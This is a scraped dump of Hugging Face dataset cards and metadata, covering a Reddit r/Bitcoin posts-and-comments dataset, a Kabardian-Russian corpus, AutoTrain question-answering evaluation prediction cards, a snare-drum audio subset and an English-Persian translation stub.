- 'subreddit.nsfw': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
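A minimal pandas sketch for working with these fields is below; the CSV filenames are assumptions, since the exact names in the download may differ.

```python
import pandas as pd

# Assumed filenames -- posts and comments ship as separate CSVs.
posts = pd.read_csv("bitcoin_posts_jun2022.csv")
comments = pd.read_csv("bitcoin_comments_jun2022.csv")

top_posts = posts.sort_values("score", ascending=False).head(10)[["title", "permalink"]]
mean_sentiment = comments["sentiment"].mean()  # comment-only field
print(top_posts, mean_sentiment)
```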
## Additional Information
### Licensing Information
CC-BY v4.0
| SocialGrep/reddit-r-bitcoin-data-for-jun-2022 | [
"annotations_creators:lexyr",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:100K<n<1M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"region:us"
] | 2022-07-25T17:11:58+00:00 | {"annotations_creators": ["lexyr"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["100K<n<1M"], "source_datasets": ["original"]} | 2022-07-25T17:22:16+00:00 | [] | [
"en"
] | TAGS
#annotations_creators-lexyr #language_creators-crowdsourced #multilinguality-monolingual #size_categories-100K<n<1M #source_datasets-original #language-English #license-cc-by-4.0 #region-us
|
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Licensing Information
## Dataset Description
- Homepage: URL
- Reddit downloader used: URL
- Point of Contact: Website
### Dataset Summary
Lite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'subreddit.id': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'subreddit.name': the human-readable name of the data point's host subreddit.
- 'subreddit.nsfw': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
## Additional Information
### Licensing Information
CC-BY v4.0
| [
"# Dataset Card for reddit-r-bitcoin-data-for-jun-2022",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Licensing Information",
"## Dataset Description\n\n- Homepage: URL\n- Reddit downloader used: URL\n- Point of Contact: Website",
"### Dataset Summary\n\nLite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.",
"### Languages\n\nMainly English.",
"## Dataset Structure",
"### Data Instances\n\nA data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.",
"### Data Fields\n\n- 'type': the type of the data point. Can be 'post' or 'comment'.\n- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.\n- 'URL': the base-36 Reddit ID of the data point's host subreddit. Unique.\n- 'URL': the human-readable name of the data point's host subreddit.\n- 'URL': a boolean marking the data point's host subreddit as NSFW or not.\n- 'created_utc': a UTC timestamp for the data point.\n- 'permalink': a reference link to the data point on Reddit.\n- 'score': score of the data point on Reddit.\n\n- 'domain': (Post only) the domain of the data point's link.\n- 'url': (Post only) the destination of the data point's link, if any.\n- 'selftext': (Post only) the self-text of the data point, if any.\n- 'title': (Post only) the title of the post data point.\n\n- 'body': (Comment only) the body of the comment data point.\n- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.",
"## Additional Information",
"### Licensing Information\n\nCC-BY v4.0"
] | [
"TAGS\n#annotations_creators-lexyr #language_creators-crowdsourced #multilinguality-monolingual #size_categories-100K<n<1M #source_datasets-original #language-English #license-cc-by-4.0 #region-us \n",
"# Dataset Card for reddit-r-bitcoin-data-for-jun-2022",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Licensing Information",
"## Dataset Description\n\n- Homepage: URL\n- Reddit downloader used: URL\n- Point of Contact: Website",
"### Dataset Summary\n\nLite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.",
"### Languages\n\nMainly English.",
"## Dataset Structure",
"### Data Instances\n\nA data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.",
"### Data Fields\n\n- 'type': the type of the data point. Can be 'post' or 'comment'.\n- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.\n- 'URL': the base-36 Reddit ID of the data point's host subreddit. Unique.\n- 'URL': the human-readable name of the data point's host subreddit.\n- 'URL': a boolean marking the data point's host subreddit as NSFW or not.\n- 'created_utc': a UTC timestamp for the data point.\n- 'permalink': a reference link to the data point on Reddit.\n- 'score': score of the data point on Reddit.\n\n- 'domain': (Post only) the domain of the data point's link.\n- 'url': (Post only) the destination of the data point's link, if any.\n- 'selftext': (Post only) the self-text of the data point, if any.\n- 'title': (Post only) the title of the post data point.\n\n- 'body': (Comment only) the body of the comment data point.\n- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.",
"## Additional Information",
"### Licensing Information\n\nCC-BY v4.0"
] |
24f194c5b6ef29eb784ea3508a022ba848beeea4 |
Kabardian (kbd), Latin script: 835k lines from a scraped text collection
Russian (ru): 3M lines from Wikipedia (OPUS) | anzorq/kbd_lat-835k_ru-3M | [
"license:unknown",
"region:us"
] | 2022-07-25T17:37:51+00:00 | {"license": "unknown"} | 2022-07-25T22:26:41+00:00 | [] | [] | TAGS
#license-unknown #region-us
|
Kabardian (kbd), Latin script: 835k lines from a scraped text collection
Russian (ru): 3M lines from Wikipedia (OPUS) | [] | [
"TAGS\n#license-unknown #region-us \n"
] |
71d820d52a2662dd708036a15374bbbd68ff57b9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
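
A minimal sketch for inspecting the predictions with the `datasets` library (the split names and column layout are assumptions -- check the repository files for the exact structure):

```python
from datasets import load_dataset

# The repository id comes from this card; splits/columns are assumptions.
preds = load_dataset(
    "autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825575"
)
print(preds)  # shows the available splits and their columns
```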
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825575 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:32+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:33:19+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
e53695a23047a407d2999206a03fc82701148a78 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825576 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:35+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:32:36+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
2803c28d2003a2afff2a01b409ff7cd42fb0fb17 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825574 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:32:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
4deeac719a3ff3df9b5866646f38a35bc45e3c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835577 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:38:58+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
34c8374562d8b0e8846c1b926bbe84f4aef4dca5 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835578 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
f329c4e36fa98c42ab3d616e01018048364d47e2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835579 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
29dd17d42866336178ac700cbb45bce287a38a34 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835580 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:35:07+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
cdfeb9020eb204c2b5b4e28ac3ef7b18a658cb76 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845582 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:18:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa-ext", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:20:32+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa-ext\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa-ext\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
8082af326609adb4497e5770cb5c05824349d0ef | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845581 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:20:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:26:00+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
dc842ba21530077e2385514585f385e671eb9f32 |
# Snares
FSD50K subset of just snares.
```
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.csv
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.zip
unzip snares.zip
```
If you unpack as described above, `snares.csv` will contain the correct filepaths to the audio files when loaded as a CSV. Here we show this with pandas...
```python
import pandas as pd
df = pd.read_csv('snares.csv')
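# Column layout is an assumption -- inspect the dataframe to confirm it.
print(df.columns)  # expect a column of filepaths into the unzipped archive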
``` | nateraw/snares | [
"language:en",
"license:other",
"region:us"
] | 2022-07-26T00:38:47+00:00 | {"language": "en", "license": "other"} | 2022-07-26T00:48:47+00:00 | [] | [
"en"
] | TAGS
#language-English #license-other #region-us
|
# Snares
FSD50K subset of just snares.
If you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas...
| [
"# Snares \n\nFSD50K subset of just snares.\n\n\n\nIf you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas..."
] | [
"TAGS\n#language-English #license-other #region-us \n",
"# Snares \n\nFSD50K subset of just snares.\n\n\n\nIf you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas..."
] |
cdeb4ea38252c283f5717b007ae8f8d5c5d3c73f | annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: [] | Kamrani/en-fa-translation | [
"region:us"
] | 2022-07-26T02:10:34+00:00 | {} | 2022-07-30T03:13:38+00:00 | [] | [] | TAGS
#region-us
| annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
